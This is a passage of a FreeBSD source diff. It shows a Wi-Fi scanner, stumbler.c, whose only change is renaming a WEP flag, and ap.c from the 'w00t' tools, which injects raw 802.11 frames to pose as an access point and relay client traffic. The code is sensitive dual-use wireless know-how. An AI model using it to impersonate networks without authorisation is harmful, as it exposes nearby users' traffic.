IEEE80211_FC0_SUBTYPE_DISASSOC: case IEEE80211_FC0_SUBTYPE_AUTH: case IEEE80211_FC0_SUBTYPE_DEAUTH: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } } diff --git a/tools/tools/net80211/stumbler/stumbler.c b/tools/tools/net80211/stumbler/stumbler.c index b649c300e124..0e8d8be693a5 100644 --- a/tools/tools/net80211/stumbler/stumbler.c +++ b/tools/tools/net80211/stumbler/stumbler.c @@ -1,1039 +1,1039 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include //int hopfreq = 3*1000; // ms int hopfreq = 500; // ms int sig_reset = 1*1000; // ms int ioctl_s = -1; int bpf_s = -1; struct chan_info { int locked; int chan; struct ieee80211req ireq; struct timeval last_hop; } chaninfo; #define CRYPT_NONE 0 #define CRYPT_WEP 1 #define CRYPT_WPA1 2 #define CRYPT_WPA 3 #define CRYPT_WPA1_TKIP 4 #define CRYPT_WPA1_TKIP_PSK 5 #define CRYPT_WPA1_CCMP 6 #define CRYPT_WPA1_CCMP_PSK 7 #define CRYPT_80211i 8 #define CRYPT_80211i_TKIP 9 #define CRYPT_80211i_TKIP_PSK 10 struct node_info { unsigned char mac[6]; int signal; int noise; int max; unsigned char ssid[256]; int chan; int wep; int pos; int ap; struct timeval seen; struct node_info* prev; struct node_info* next; } *nodes = 0; void clean_crap() { struct node_info* next; if (ioctl_s != -1) close(ioctl_s); if (bpf_s != -1) close(bpf_s); while (nodes) { next = nodes->next; free(nodes); nodes = next; } } char* mac2str(unsigned char* mac) { static char ret[6*3]; sprintf(ret, "%.2X:%.2X:%.2X:%.2X:%.2X:%.2X", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]); return ret; } char* wep2str(int w) { char* wep = 0; static char res[14]; switch (w) { case CRYPT_NONE: wep = ""; break; case CRYPT_WEP: wep = "WEP"; break; case CRYPT_WPA1: wep = "WPA1"; break; case CRYPT_WPA: wep = "WPA?"; break; case CRYPT_WPA1_TKIP: wep = "WPA1-TKIP"; break; case CRYPT_WPA1_TKIP_PSK: wep = "WPA1-TKIP-PSK"; break; case CRYPT_WPA1_CCMP: wep = "WPA1-CCMP"; break; case CRYPT_WPA1_CCMP_PSK: wep = "WPA1-CCMP-PSK"; break; case CRYPT_80211i: wep = "i"; break; case CRYPT_80211i_TKIP: wep = "11i-TKIP"; break; case CRYPT_80211i_TKIP_PSK: wep = "11i-TKIP-PSK"; break; default: wep = "FIXME!"; break; } memset(res, ' ', sizeof(res)); assert(strlen(wep) < sizeof(res)); memcpy(res, wep, strlen(wep)); res[sizeof(res)-1] = 0; return res; } char* ssid2str(struct node_info* node) { static char res[24]; memset(res, ' ', sizeof(res)); res[0] = '['; strcpy(&res[sizeof(res)-2], "]"); if (node->ap) { int left = sizeof(res) - 3; if (strlen(node->ssid) < left) left = strlen(node->ssid); memcpy(&res[1], node->ssid, left); } else { memcpy(&res[1], "", 8); } return res; } void save_state() { FILE* f; struct node_info* node = nodes; f = fopen("stumbler.log", "w"); if (!f) { perror("fopen()"); exit(1); } while (node) { struct tm* t; char tim[16]; t = localtime( (time_t*) &node->seen.tv_sec); if (!t) { perror("localtime()"); exit(1); } tim[0] = 0; strftime(tim, sizeof(tim), "%H:%M:%S", t); fprintf(f, "%s %s %s %2d %s 0x%.2x\n", tim, mac2str(node->mac), wep2str(node->wep), node->chan, ssid2str(node), node->max); node = node->next; } fclose(f); } void cleanup(int x) { endwin(); clean_crap(); exit(0); } void die(int p, char* msg) { endwin(); if (p) perror(msg); else printf("%s\n", msg); clean_crap(); exit(1); } void display_chan() { int x, y; char tmp[3]; x = COLS - 2; y = LINES - 1; snprintf(tmp, sizeof(tmp), "%.2d", chaninfo.chan); mvaddstr(y, x, tmp); refresh(); } void set_chan(int c) { chaninfo.ireq.i_val = c; if (ioctl(ioctl_s, SIOCS80211, &chaninfo.ireq) == -1) die(1, "ioctl(SIOCS80211) [chan]"); chaninfo.chan = c; if (gettimeofday(&chaninfo.last_hop, NULL) == -1) die(1, "gettimeofday()"); display_chan(); } void setup_if(char *dev) { struct ifreq ifr; unsigned int flags; // set chan memset(&chaninfo.ireq, 0, sizeof(chaninfo.ireq)); strcpy(chaninfo.ireq.i_name, dev); chaninfo.ireq.i_type = IEEE80211_IOC_CHANNEL; set_chan(1); // set iface up and promisc memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, dev); if (ioctl(ioctl_s, SIOCGIFFLAGS, &ifr) == -1) die(1, "ioctl(SIOCGIFFLAGS)"); flags = (ifr.ifr_flags & 0xffff) | (ifr.ifr_flagshigh << 16); flags |= IFF_UP | IFF_PPROMISC; memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, dev); ifr.ifr_flags = flags & 0xffff; ifr.ifr_flagshigh = flags >> 16; if (ioctl(ioctl_s, SIOCSIFFLAGS, &ifr) == -1) die(1, "ioctl(SIOCSIFFLAGS)"); } void open_bpf(char *dev, int dlt) { int i; char buf[64]; int fd = -1; struct ifreq ifr; for(i = 0;i < 16; i++) { sprintf(buf, "/dev/bpf%d", i); fd = open(buf, O_RDWR); if(fd < 0) { if(errno != EBUSY) die(1,"can't open /dev/bpf"); continue; } else break; } if(fd < 0) die(1, "can't open /dev/bpf"); strncpy(ifr.ifr_name, dev, sizeof(ifr.ifr_name)-1); ifr.ifr_name[sizeof(ifr.ifr_name)-1] = 0; if(ioctl(fd, BIOCSETIF, &ifr) < 0) die(1, "ioctl(BIOCSETIF)"); if (ioctl(fd, BIOCSDLT, &dlt) < 0) die(1, "ioctl(BIOCSDLT)"); i = 1; if(ioctl(fd, BIOCIMMEDIATE, &i) < 0) die(1, "ioctl(BIOCIMMEDIATE)"); bpf_s = fd; } void user_input() { static char chan[3]; static int pos = 0; int c; c = getch(); switch (c) { case 'w': save_state(); break; case 'q': cleanup(0); break; case 'c': chaninfo.locked = !chaninfo.locked; break; case ERR: die(0, "getch()"); break; case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': chan[pos++] = c; if (pos == 2) { int ch = atoi(chan); if (ch <= 11 && ch >= 1) { set_chan(atoi(chan)); chaninfo.locked = 1; } pos = 0; } break; default: pos = 0; break; } } void display_node(struct node_info* node) { int x = 0; int y = 0; int i; char chan[3]; char* ssid = 0; int sig, max, left, noise; char* wep = 0; y = node->pos; if (y == -1) // offscreen return; assert(y < LINES); // MAC mvaddstr(y, x, mac2str(node->mac)); x += 6*3; // WEP wep = wep2str(node->wep); assert(wep); mvaddstr(y, x, wep); x += strlen(wep); x++; // CHAN sprintf(chan, "%.2d", node->chan); mvaddstr(y, x, chan); x += 3; // ssid ssid = ssid2str(node); assert(ssid); mvaddstr(y, x, ssid); x += strlen(ssid); x++; left = COLS - x - 1; sig = (int) ( ((double)node->signal)*left/100.0 ); noise=(int) ( ((double)node->noise)*left/100.0 ); max = (int) ( ((double)node->max)*left/100.0 ); // SIGNAL BAR for (i = 0; i < noise; i++) mvaddch(y, x++, 'N'); for (; i < sig; i++) mvaddch(y,x++, 'X'); for (; i < max; i++) mvaddch(y,x++, ' '); mvaddch(y,x++, '|'); for (; x < COLS-1; x++) mvaddch(y, x, ' '); assert (x <= COLS); } void update_node(struct node_info* data) { struct node_info* node; int sort = 0; assert(data->signal <= 100); node = nodes; // first time [virgin] if (!node) { node = (struct node_info*) malloc(sizeof(struct node_info)); if (!node) die(1, "malloc()"); memset(node, 0, sizeof(*node)); memcpy(node->mac, data->mac, 6); nodes = node; } while (node) { // found it if (memcmp(node->mac, data->mac, 6) == 0) break; // end of chain if (!node->next) { node->next = (struct node_info*) malloc(sizeof(struct node_info)); if (!node->next) die(1, "malloc()"); memset(node->next, 0, sizeof(*node->next)); memcpy(node->next->mac, data->mac, 6); node->next->prev = node; node->next->pos = node->pos+1; node = node->next; if (node->pos == LINES) sort = 1; break; } node = node->next; } assert(node); // too many nodes for screen if (sort) { struct node_info* ni = nodes; while (ni) { if (ni->pos != -1) ni->pos--; display_node(ni); ni = ni->next; } } node->signal = data->signal; if (data->signal > node->max) node->max = data->signal; if (gettimeofday(&node->seen, NULL) == -1) die(1, "gettimeofday()"); if (data->ssid[0] != 0) strcpy(node->ssid, data->ssid); if (data->chan != -1) node->chan = data->chan; if (data->wep != -1) { // XXX LAME --- won't detect if AP changes WEP mode in // beacons... if (node->wep != CRYPT_WEP && node->wep != CRYPT_NONE && data->wep == CRYPT_WEP) { } else node->wep = data->wep; } if (data->ap != -1) node->ap = data->ap; display_node(node); refresh(); } void get_beacon_info(unsigned char* data, int rd, struct node_info* node) { int blen = 8 + 2 + 2; strcpy(node->ssid, ""); node->chan = 0; node->wep = CRYPT_NONE; assert(rd >= blen); if (IEEE80211_BEACON_CAPABILITY(data) & IEEE80211_CAPINFO_PRIVACY) node->wep = CRYPT_WEP; data += blen; rd -= blen; while (rd > 2) { int eid, elen; eid = *data; data++; elen = *data; data++; rd -= 2; // short! if (rd < elen) { return; } // ssid if (eid == 0) { if (elen == 1 && data[0] == 0) { // hidden } else { memcpy(node->ssid, data, elen); node->ssid[elen] = 0; } } // chan else if(eid == 3) { // weird chan! if( elen != 1) goto next; node->chan = *data; } // WPA else if (eid == 221 && node->wep == CRYPT_WEP) { struct ieee80211_ie_wpa* wpa; wpa = (struct ieee80211_ie_wpa*) data; if (elen < 6) goto next; if (!memcmp(wpa->wpa_oui, "\x00\x50\xf2", 3)) { // node->wep = CRYPT_WPA; } else goto next; if (wpa->wpa_type == WPA_OUI_TYPE && le16toh(wpa->wpa_version) == WPA_VERSION) { int cipher, auth; unsigned char* ptr; node->wep = CRYPT_WPA1; if (elen < 12) goto next; cipher = ((unsigned char*) wpa->wpa_mcipher)[3]; ptr = (unsigned char*)wpa + 12 + 4 * le16toh(wpa->wpa_uciphercnt); if (elen < (ptr - data + 6)) goto next; if ( *((unsigned short*) ptr) == 0) goto next; ptr += 2 + 3; auth = *ptr; if (cipher == WPA_CSE_TKIP) { node->wep = CRYPT_WPA1_TKIP; if (auth == WPA_ASE_8021X_PSK) node->wep = CRYPT_WPA1_TKIP_PSK; } if (cipher == WPA_CSE_CCMP) { node->wep = CRYPT_WPA1_CCMP; if (auth == WPA_ASE_8021X_PSK) node->wep = CRYPT_WPA1_CCMP_PSK; } } } else if (eid == 48 && node->wep == CRYPT_WEP) { unsigned char* ptr; // XXX no bounds checking ptr = data; if (ptr[0] == 1 && ptr[1] == 0) { unsigned short* count; int cipher = 0; ptr += 2; node->wep = CRYPT_80211i; if (!memcmp(ptr, "\x00\x0f\xac\x02", 4)) { node->wep = CRYPT_80211i_TKIP; cipher = 1; } ptr += 4; count = (unsigned short*) ptr; ptr +=2 + *count*4; count = (unsigned short*) ptr; if (*count) { ptr += 2; if (!memcmp(ptr,"\x00\x0f\xac\x02", 4)) { if (cipher) node->wep = CRYPT_80211i_TKIP_PSK; } } } } next: data += elen; rd -= elen; } } int get_packet_info(struct ieee80211_frame* wh, unsigned char* body, int bodylen, struct node_info* node) { int type, stype; node->chan = chaninfo.chan; node->wep = -1; node->ssid[0] = 0; node->ap = -1; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; if (type == IEEE80211_FC0_TYPE_CTL) return 0; #if 0 if (wh->i_addr2[0] != 0) { mvprintw(30,30,"%s %x",mac2str(wh->i_addr2), wh->i_fc[0]); } #endif stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (type == IEEE80211_FC0_TYPE_MGT && stype == IEEE80211_FC0_SUBTYPE_BEACON) { get_beacon_info(body, bodylen, node); node->ap = 1; } else if (type == IEEE80211_FC0_TYPE_DATA && stype == IEEE80211_FC0_SUBTYPE_DATA) { - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { unsigned char* iv; node->wep = CRYPT_WEP; iv = body; iv += 3; // extended IV? if (*iv & (1 << 1)) { #if 0 node->wep = CRYPT_WPA; mvprintw(20,20, "shei"); exit(1); #endif } } if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) node->ap = 1; else node->ap = 0; } memcpy(node->mac, wh->i_addr2, 6); return 1; } void radiotap(unsigned char* data, int rd) { struct ieee80211_radiotap_header* rth; struct ieee80211_frame* wh; char* body; struct node_info node; int8_t signal_dbm, noise_dbm; uint8_t signal_db, noise_db; int dbm = 0; int signal = 0; int i; rd -= 4; // 802.11 CRC // radiotap rth = (struct ieee80211_radiotap_header*) data; // 802.11 wh = (struct ieee80211_frame*) ((char*)rth + rth->it_len); rd -= rth->it_len; assert (rd >= 0); // body body = (char*) wh + sizeof(*wh); rd -= sizeof(*wh); if (!get_packet_info(wh, body, rd, &node)) return; // signal and noise body = (char*) rth + sizeof(*rth); signal_dbm = noise_dbm = signal_db = noise_db = 0; for (i = IEEE80211_RADIOTAP_TSFT; i <= IEEE80211_RADIOTAP_EXT; i++) { if (!(rth->it_present & (1 << i))) continue; switch (i) { case IEEE80211_RADIOTAP_TSFT: body += sizeof(uint64_t); break; case IEEE80211_RADIOTAP_FLAGS: case IEEE80211_RADIOTAP_RATE: body += sizeof(uint8_t); break; case IEEE80211_RADIOTAP_CHANNEL: body += sizeof(uint16_t)*2; break; case IEEE80211_RADIOTAP_FHSS: body += sizeof(uint16_t); break; case IEEE80211_RADIOTAP_DBM_ANTSIGNAL: signal_dbm = *body; body++; dbm = 1; break; case IEEE80211_RADIOTAP_DBM_ANTNOISE: noise_dbm = *body; body++; break; case IEEE80211_RADIOTAP_DB_ANTSIGNAL: signal_db = *((unsigned char*)body); body++; break; case IEEE80211_RADIOTAP_DB_ANTNOISE: noise_db = *((unsigned char*)body); body++; break; case IEEE80211_RADIOTAP_EXT: abort(); break; } } if (dbm) { signal = signal_dbm - noise_dbm; } else { signal = signal_db - noise_db; } if (signal < 0) signal = 0; node.signal = signal; #if 0 if (node.signal > 100 || node.signal < 0) { mvprintw(25,25, "sig=%d", node.signal); } #else assert (node.signal <= 100 && node.signal >= 0); #endif update_node(&node); } void bpf_input() { static unsigned char buf[4096]; int rd; struct bpf_hdr* bpfh; unsigned char* data; rd = read(bpf_s, buf, sizeof(buf)); if (rd == -1) die(1,"read()"); bpfh = (struct bpf_hdr*) buf; rd -= bpfh->bh_hdrlen; if (rd != bpfh->bh_caplen) { assert( rd > bpfh->bh_caplen); rd = bpfh->bh_caplen; } data = (unsigned char*) bpfh + bpfh->bh_hdrlen; radiotap(data, rd); } unsigned long elapsed_ms(struct timeval* now, struct timeval* prev) { unsigned long elapsed = 0; if (now->tv_sec > prev->tv_sec) elapsed = 1000*1000 - prev->tv_usec + now->tv_usec; else { assert(now->tv_sec == prev->tv_sec); elapsed = now->tv_usec - prev->tv_usec; } elapsed /= 1000; //ms elapsed += (now->tv_sec - prev->tv_sec)*1000; return elapsed; } void chanhop(struct timeval* tv) { unsigned long elapsed = 0; if (gettimeofday(tv, NULL) == -1) die(1, "gettimeofday()"); elapsed = elapsed_ms(tv, &chaninfo.last_hop); // need to chan hop if (elapsed >= hopfreq) { int c; c = chaninfo.chan + 1; if (c > 11) c = 1; set_chan(c); elapsed = hopfreq; } // how much can we sleep? else { elapsed = hopfreq - elapsed; } // ok calculate sleeping time... tv->tv_sec = elapsed/1000; tv->tv_usec = (elapsed - tv->tv_sec*1000)*1000; } void check_seen(struct timeval* tv) { unsigned long elapsed = 0; struct timeval now; int need_refresh = 0; unsigned long min_wait = 0; unsigned long will_wait; will_wait = tv->tv_sec*1000+tv->tv_usec/1000; min_wait = will_wait; struct node_info* node = nodes; if (gettimeofday(&now, NULL) == -1) die(1, "gettimeofday()"); while(node) { if (node->signal) { elapsed = elapsed_ms(&now, &node->seen); // node is dead... if (elapsed >= sig_reset) { node->signal = 0; display_node(node); need_refresh = 1; } // need to check soon possibly... else { unsigned long left; left = sig_reset - elapsed; if (left < min_wait) left = min_wait; } } node = node->next; } if (need_refresh) refresh(); // need to sleep for less... if (min_wait < will_wait) { tv->tv_sec = min_wait/1000; tv->tv_usec = (min_wait - tv->tv_sec*1000)*1000; } } void own(char* ifname) { int rd; fd_set fds; struct timeval tv; int dlt = DLT_IEEE802_11_RADIO; hopfreq = 1000; setup_if(ifname); open_bpf(ifname, dlt); while(1) { // XXX innefficient all of this... if (!chaninfo.locked) chanhop(&tv); else { tv.tv_sec = 1; tv.tv_usec = 0; } // especially this... check_seen(&tv); FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(bpf_s, &fds); rd = select(bpf_s+1, &fds,NULL , NULL, &tv); if (rd == -1) die(1, "select()"); if (FD_ISSET(0, &fds)) user_input(); if (FD_ISSET(bpf_s, &fds)) bpf_input(); } } void init_globals() { ioctl_s = socket(PF_INET, SOCK_DGRAM, 0); if (ioctl_s == -1) { perror("socket()"); exit(1); } chaninfo.locked = 0; chaninfo.chan = 0; } int main(int argc, char *argv[]) { if (argc < 2) { printf("Usage: %s \n", argv[0]); exit(1); } init_globals(); initscr(); cbreak(); noecho(); nonl(); intrflush(stdscr, FALSE); keypad(stdscr, TRUE); curs_set(0); clear(); refresh(); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); own(argv[1]); cleanup(0); exit(0); } diff --git a/tools/tools/net80211/w00t/ap/ap.c b/tools/tools/net80211/w00t/ap/ap.c index 65f7adb1e902..836f588a65b6 100644 --- a/tools/tools/net80211/w00t/ap/ap.c +++ b/tools/tools/net80211/w00t/ap/ap.c @@ -1,916 +1,916 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include "w00t.h" struct client { char mac[6]; int seq; struct client *next; }; struct params { /* fds */ int tx; int rx; int tap; /* ap params */ char mac[6]; char ssid[256]; int chan; /* beacon */ int bint; struct timeval blast; int seq; /* wep */ int wep_len; char wep_key[13]; int wep_iv; struct client *clients; /* lame window */ char packet[4096]; int packet_len; int packet_try; struct timeval plast; }; void usage(char *name) { printf("Usage: %s \n" "-h\thelp\n" "-i\t\n" "-s\t\n" "-m\t\n" "-w\t\n" "-c\t\n" "-t\t\n" , name); exit(0); } void fill_basic(struct ieee80211_frame *wh, struct params *p) { short *seq; wh->i_dur[0] = 0x69; wh->i_dur[1] = 0x00; memcpy(wh->i_addr2, p->mac, 6); seq = (short*)wh->i_seq; *seq = seqfn(p->seq, 0); } void send_frame(struct params *p, void *buf, int len) { int rc; rc = inject(p->tx, buf, len); if (rc == -1) err(1, "inject()"); if (rc != len) { printf("injected %d/%d\n", rc, len); exit(1); } p->seq++; } int fill_beacon(struct params *p, struct ieee80211_frame *wh) { int len; char *ptr; ptr = (char*) (wh+1); ptr += 8; /* timestamp */ ptr += 2; /* bint */ *ptr |= IEEE80211_CAPINFO_ESS; ptr += 2; /* capa */ /* ssid */ len = strlen(p->ssid); *ptr++ = 0; *ptr++ = len; memcpy(ptr, p->ssid, len); ptr += len; /* rates */ *ptr++ = 1; *ptr++ = 4; *ptr++ = 2 | 0x80; *ptr++ = 4 | 0x80; *ptr++ = 11; *ptr++ = 22; /* ds param */ *ptr++ = 3; *ptr++ = 1; *ptr++ = p->chan; return ptr - ((char*) wh); } void send_beacon(struct params *p) { char buf[4096]; struct ieee80211_frame *wh; int len; char *ptr; wh = (struct ieee80211_frame*) buf; memset(buf, 0, sizeof(buf)); fill_basic(wh, p); memset(wh->i_addr1, 0xff, 6); memcpy(wh->i_addr3, p->mac, 6); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_BEACON; len = fill_beacon(p, wh); /* TIM */ ptr = (char*)wh + len; *ptr++ = 5; *ptr++ = 4; len += 2+4; #if 0 printf("sending beacon\n"); #endif send_frame(p, wh, len); if (gettimeofday(&p->blast, NULL) == -1) err(1, "gettimeofday()"); } void send_pres(struct params *p, char *mac) { char buf[4096]; struct ieee80211_frame *wh; int len; wh = (struct ieee80211_frame*) buf; memset(buf, 0, sizeof(buf)); fill_basic(wh, p); memcpy(wh->i_addr1, mac, 6); memcpy(wh->i_addr3, p->mac, 6); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_PROBE_RESP; len = fill_beacon(p, wh); printf("sending probe response\n"); send_frame(p, wh, len); } void read_preq(struct params *p, struct ieee80211_frame *wh, int len) { unsigned char *ptr; unsigned char *end; unsigned char macs[6*3]; ptr = (unsigned char*) (wh+1); /* ssid */ if (*ptr != 0) { printf("weird pr %x\n", *ptr); return; } ptr++; end = ptr + (*ptr) + 1; *end = 0; ptr++; mac2str(macs, wh->i_addr2); printf("Probe request for [%s] from %s\n", ptr, macs); if ((strcmp(ptr, "") == 0) || (strcmp(ptr, p->ssid) == 0)) send_pres(p, wh->i_addr2); } void send_auth(struct params* p, char *mac) { char buf[4096]; struct ieee80211_frame *wh; unsigned short *ptr; int len; wh = (struct ieee80211_frame*) buf; memset(buf, 0, sizeof(buf)); fill_basic(wh, p); memcpy(wh->i_addr1, mac, 6); memcpy(wh->i_addr3, p->mac, 6); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_AUTH; ptr = (unsigned short*) (wh+1); *ptr++ = htole16(0); *ptr++ = htole16(2); *ptr++ = htole16(0); len = ((char*)ptr) - ((char*) wh); printf("sending auth\n"); send_frame(p, wh, len); } void read_auth(struct params *p, struct ieee80211_frame *wh, int len) { unsigned short *ptr; char mac[6*3]; if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; ptr = (unsigned short*) (wh+1); if (le16toh(*ptr) != 0) { printf("Unknown auth algo %d\n", le16toh(*ptr)); return; } ptr++; if (le16toh(*ptr) == 1) { mac2str(mac, wh->i_addr2); printf("Got auth from %s\n", mac); send_auth(p, wh->i_addr2); } else { printf("Weird seq in auth %d\n", le16toh(*ptr)); } } void send_assoc(struct params *p, char *mac) { char buf[4096]; struct ieee80211_frame *wh; char *ptr; int len; wh = (struct ieee80211_frame*) buf; memset(buf, 0, sizeof(buf)); fill_basic(wh, p); memcpy(wh->i_addr1, mac, 6); memcpy(wh->i_addr3, p->mac, 6); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_ASSOC_RESP; ptr = (char*) (wh+1); *ptr |= IEEE80211_CAPINFO_ESS; ptr += 2; /* cap */ ptr += 2; /* status */ ptr += 2; /* aid */ /* rates */ *ptr++ = 1; *ptr++ = 4; *ptr++ = 2 | 0x80; *ptr++ = 4 | 0x80; *ptr++ = 11; *ptr++ = 22; len = ptr - ((char*) wh); printf("sending assoc response\n"); send_frame(p, wh, len); } void read_assoc(struct params *p, struct ieee80211_frame *wh, int len) { unsigned char *ptr; unsigned char *end; unsigned char macs[6*3]; if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; ptr = (unsigned char*) (wh+1); ptr += 2; /* capa */ ptr += 2; /* list interval */ /* ssid */ if (*ptr != 0) { printf("weird pr %x\n", *ptr); return; } ptr++; end = ptr + (*ptr) + 1; *end = 0; ptr++; mac2str(macs, wh->i_addr2); printf("Assoc request for [%s] from %s\n", ptr, macs); if (strcmp(ptr, p->ssid) == 0) send_assoc(p, wh->i_addr2); } void read_mgt(struct params *p, struct ieee80211_frame *wh, int len) { switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_PROBE_REQ: read_preq(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_PROBE_RESP: break; case IEEE80211_FC0_SUBTYPE_AUTH: read_auth(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: read_assoc(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: break; default: printf("wtf %d\n", (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT); abort(); break; } } void send_cts(struct params *p, char *mac) { char buf[64]; struct ieee80211_frame *wh; memset(buf, 0, sizeof(buf)); wh = (struct ieee80211_frame*) buf; wh->i_fc[0] |= IEEE80211_FC0_TYPE_CTL; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_CTS; wh->i_dur[0] = 0x69; wh->i_dur[0] = 0x00; memcpy(wh->i_addr1, mac, 6); send_frame(p, wh, 10); } void read_rts(struct params *p, struct ieee80211_frame *wh, int len) { if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; send_cts(p, wh->i_addr2); } void read_ack(struct params *p, struct ieee80211_frame *wh, int len) { if (memcmp(wh->i_addr1, p->mac, 6) == 0) p->packet_try = 0; } void read_ctl(struct params *p, struct ieee80211_frame *wh, int len) { switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_RTS: read_rts(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_ACK: read_ack(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_CTS: break; default: printf("wtf %d\n", (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT); abort(); break; } #if 0 printf("ctl\n"); #endif } int broadcast(struct ieee80211_frame *wh) { /* XXX multicast */ if (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) == 0) return 1; return 0; } void enque(struct params *p, struct ieee80211_frame *wh, int len) { if (broadcast(wh)) return; assert(sizeof(p->packet) >= len); memcpy(p->packet, wh, len); p->packet_len = len; p->packet_try = 1; wh = (struct ieee80211_frame*) p->packet; wh->i_fc[1] |= IEEE80211_FC1_RETRY; if (gettimeofday(&p->plast, NULL) == -1) err(1, "gettimeofday()"); } void relay_data(struct params *p, struct ieee80211_frame *wh, int len) { char seq[2]; char fc[2]; unsigned short *ps; /* copy crap */ memcpy(fc, wh->i_fc, 2); memcpy(seq, wh->i_seq, 2); /* relay frame */ wh->i_fc[1] &= ~(IEEE80211_FC1_DIR_TODS | IEEE80211_FC1_RETRY); wh->i_fc[1] |= IEEE80211_FC1_DIR_FROMDS; memcpy(wh->i_addr1, wh->i_addr3, sizeof(wh->i_addr1)); memcpy(wh->i_addr3, wh->i_addr2, sizeof(wh->i_addr3)); memcpy(wh->i_addr2, p->mac, sizeof(wh->i_addr2)); ps = (unsigned short*)wh->i_seq; *ps = seqfn(p->seq, 0); send_frame(p, wh, len); enque(p, wh, len); /* restore */ memcpy(wh->i_fc, fc, sizeof(fc)); memcpy(wh->i_addr2, wh->i_addr3, sizeof(wh->i_addr2)); memcpy(wh->i_addr3, wh->i_addr1, sizeof(wh->i_addr2)); memcpy(wh->i_addr1, p->mac, sizeof(wh->i_addr1)); 